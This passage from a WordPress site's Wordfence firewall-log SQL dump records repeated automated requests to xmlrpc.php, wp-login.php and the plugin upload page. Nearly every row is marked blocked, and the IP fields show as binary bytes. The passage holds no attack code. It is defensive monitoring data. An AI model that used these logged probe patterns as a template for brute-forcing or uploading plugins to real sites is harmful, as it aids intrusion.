Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11040,0.000000,1630738293.972894,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11041,0.000000,1630738506.376195,'\0\0\0\0\0\0\0\0\0\0���$-I',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11042,0.000000,1630738667.907165,'\0\0\0\0\0\0\0\0\0\0���Y3�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11043,0.000000,1630738848.987956,'\0\0\0\0\0\0\0\0\0\0���Q֨',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11044,0.000000,1630739048.016033,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11045,0.000000,1630739209.754751,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11046,0.000000,1630739241.133291,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailValidUsername',NULL,NULL),(11047,0.000000,1630739396.971050,'\0\0\0\0\0\0\0\0\0\0���a��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11048,0.000000,1630739587.702593,'\0\0\0\0\0\0\0\0\0\0����8$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11049,0.000000,1630739767.867741,'\0\0\0\0\0\0\0\0\0\0���]c8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11050,0.000000,1630739933.676337,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11051,0.000000,1630740118.617819,'\0\0\0\0\0\0\0\0\0\0���Q�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11052,0.000000,1630740188.739615,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11053,1630740201.710276,1630740201.621200,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11054,0.000000,1630740307.855853,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11055,0.000000,1630740479.222952,'\0\0\0\0\0\0\0\0\0\0��[��R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11056,0.000000,1630740636.563833,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11057,0.000000,1630740832.302219,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11058,0.000000,1630740982.933818,'\0\0\0\0\0\0\0\0\0\0��1���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11059,0.000000,1630741179.408790,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11060,0.000000,1630741354.910509,'\0\0\0\0\0\0\0\0\0\0��)�$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11061,0.000000,1630741514.487305,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11062,0.000000,1630741619.101840,'\0\0\0\0\0\0\0\0\0\0��h���',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11063,0.000000,1630741700.438107,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11064,0.000000,1630741881.049767,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11065,0.000000,1630742059.893055,'\0\0\0\0\0\0\0\0\0\0���]��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11066,0.000000,1630742220.117711,'\0\0\0\0\0\0\0\0\0\0���cN�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11067,0.000000,1630742395.186611,'\0\0\0\0\0\0\0\0\0\0�����A',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11068,0.000000,1630742580.126125,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11069,0.000000,1630743093.212799,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11070,1630743109.870578,1630743109.779700,'\0\0\0\0\0\0\0\0\0\0���6�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11071,0.000000,1630744024.723261,'\0\0\0\0\0\0\0\0\0\0��\rL��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11072,0.000000,1630744034.559451,'\0\0\0\0\0\0\0\0\0\0���a�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11073,0.000000,1630744217.563794,'\0\0\0\0\0\0\0\0\0\0���?%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11074,0.000000,1630744367.478600,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11075,0.000000,1630744546.447860,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11076,0.000000,1630744742.249577,'\0\0\0\0\0\0\0\0\0\0��zrL�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11077,0.000000,1630745053.778950,'\0\0\0\0\0\0\0\0\0\0��#�K',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11078,0.000000,1630745248.152448,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11079,0.000000,1630745434.980324,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11080,0.000000,1630745616.567802,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11081,0.000000,1630745778.465118,'\0\0\0\0\0\0\0\0\0\0��go(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11082,0.000000,1630745947.385881,'\0\0\0\0\0\0\0\0\0\0��gt�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11083,0.000000,1630746146.811335,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11084,0.000000,1630746227.500288,'\0\0\0\0\0\0\0\0\0\0���,',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11085,0.000000,1630746322.148229,'\0\0\0\0\0\0\0\0\0\0��#��N',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11086,0.000000,1630746345.669658,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11087,1630746365.220790,1630746365.132900,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11088,0.000000,1630746476.358257,'\0\0\0\0\0\0\0\0\0\0��j',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11089,0.000000,1630746668.139013,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11090,0.000000,1630746857.930135,'\0\0\0\0\0\0\0\0\0\0���>n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11091,0.000000,1630747046.457297,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11092,0.000000,1630747239.929480,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11093,0.000000,1630747426.369391,'\0\0\0\0\0\0\0\0\0\0��C�,6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11094,0.000000,1630747603.310987,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11095,0.000000,1630747791.804948,'\0\0\0\0\0\0\0\0\0\0��_o�)',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11096,0.000000,1630747971.696786,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11097,0.000000,1630748153.817892,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11098,0.000000,1630748249.695330,'\0\0\0\0\0\0\0\0\0\0��#���',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11099,0.000000,1630748312.529175,'\0\0\0\0\0\0\0\0\0\0��\"��q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11100,0.000000,1630748535.287465,'\0\0\0\0\0\0\0\0\0\0��Wk�6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11101,0.000000,1630748697.036904,'\0\0\0\0\0\0\0\0\0\0��ՈH�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11102,0.000000,1630748864.862121,'\0\0\0\0\0\0\0\0\0\0��gQW',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11103,0.000000,1630749065.732347,'\0\0\0\0\0\0\0\0\0\0��Kw��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11104,0.000000,1630749175.118614,'\0\0\0\0\0\0\0\0\0\0��Cᡀ',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11105,0.000000,1630749222.155967,'\0\0\0\0\0\0\0\0\0\0���G�k',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11106,0.000000,1630749405.073580,'\0\0\0\0\0\0\0\0\0\0����\"�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11107,0.000000,1630749613.011510,'\0\0\0\0\0\0\0\0\0\0���ф',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11108,0.000000,1630749797.545109,'\0\0\0\0\0\0\0\0\0\0���26',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11109,0.000000,1630749812.976590,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11110,0.000000,1630749973.882377,'\0\0\0\0\0\0\0\0\0\0���VM�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11111,0.000000,1630750173.581865,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11112,0.000000,1630750271.950193,'\0\0\0\0\0\0\0\0\0\0��\"{��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11113,0.000000,1630750358.534111,'\0\0\0\0\0\0\0\0\0\0��N/:�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11114,0.000000,1630750430.313336,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11115,1630750446.226711,1630750446.108600,'\0\0\0\0\0\0\0\0\0\0���6�D',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11116,0.000000,1630750537.627471,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11117,0.000000,1630750723.392697,'\0\0\0\0\0\0\0\0\0\0��m�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11118,0.000000,1630750920.243311,'\0\0\0\0\0\0\0\0\0\0��Cޘ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11119,0.000000,1630751096.342634,'\0\0\0\0\0\0\0\0\0\0���M',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11120,0.000000,1630751265.326959,'\0\0\0\0\0\0\0\0\0\0��|�\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11121,0.000000,1630751485.368614,'\0\0\0\0\0\0\0\0\0\0��go(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11122,0.000000,1630751672.001468,'\0\0\0\0\0\0\0\0\0\0��l���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11123,0.000000,1630751858.033256,'\0\0\0\0\0\0\0\0\0\0��,�h�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11124,0.000000,1630752026.804076,'\0\0\0\0\0\0\0\0\0\0��gZ�[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11125,0.000000,1630752198.815886,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11126,1630752226.566339,1630752226.041900,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11127,0.000000,1630752240.900403,'\0\0\0\0\0\0\0\0\0\0��%���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11128,0.000000,1630752309.074347,'\0\0\0\0\0\0\0\0\0\0����@�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11129,0.000000,1630752409.835545,'\0\0\0\0\0\0\0\0\0\0��/��/',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11130,0.000000,1630752615.142358,'\0\0\0\0\0\0\0\0\0\0���U��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 